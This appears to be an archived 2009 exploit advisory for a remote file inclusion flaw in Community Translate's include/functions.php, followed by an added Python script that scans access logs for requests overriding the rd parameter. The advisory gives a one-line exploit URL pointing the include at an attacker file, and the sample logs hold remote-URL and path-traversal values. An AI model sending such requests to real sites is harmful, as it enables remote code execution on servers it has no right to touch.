Community Translate - Remote File Inclusion

EDB-ID   : 10045
CVE      : N/A
Author   : NoGe
Type     : webapps
Platform : PHP
Date     : 2009-10-12


[o] Community Translate Remote File Inclusion Vulnerability
Software     : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author       : NoGe
Contact      : noge[dot]code[at]gmail[dot]com
Blog         : http://evilc0de.blogspot.com/
Home         : http://antisecurity.org/

[o] Vulnerable file
File : include/functions.php
Code : require_once("$rd/include/utilfunctions.php");

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]
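
[o] Detection (added example, not part of the original advisory or the project's code)
This check scans web-server access logs for direct requests to include/functions.php that carry an rd parameter, the request shape shown above. The log lines are constructed samples; the Apache combined log format and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (Apache combined format), not from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Oct/2009:10:01:02 +0000] "GET /ct/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Oct/2009:10:02:17 +0000] "GET /ct/include/functions.php?rd=http%3A%2F%2Fexample.invalid%2Fa HTTP/1.1" 200 312 "-" "curl/7.19"
192.0.2.44 - - [12/Oct/2009:10:02:40 +0000] "GET /ct/include/functions.php?rd=../../tmp HTTP/1.1" 200 0 "-" "curl/7.19"
192.0.2.10 - - [12/Oct/2009:10:03:05 +0000] "GET /ct/include/functions.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2009:10:04:00 +0000] "GET /ct/include/functions.php?x=1&rd=base HTTP/1.1" 200 0 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.IGNORECASE)
TARGET_SUFFIX = "/include/functions.php"  # file named in the advisory
PARAM = "rd"                              # variable used in its require_once


def classify(value):
    """Label what a client-supplied rd value would point the include at."""
    if SCHEME_RE.match(value):
        return "remote-or-wrapper"   # http://, ftp://, php://, data: ...
    if ".." in value or value.startswith("/"):
        return "local-path"
    return "override"                # any rd on a direct request is abnormal


def find_rd_overrides(log_text):
    """Return (client, status, kind, decoded_value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith(TARGET_SUFFIX):
            continue
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            hits.append((client, int(status), classify(value), value))
    return hits


if __name__ == "__main__":
    for hit in find_rd_overrides(SAMPLE_LOG):
        print(hit)
```

It inspects only the query string, which is where the URL above places rd; values are percent-decoded before classification.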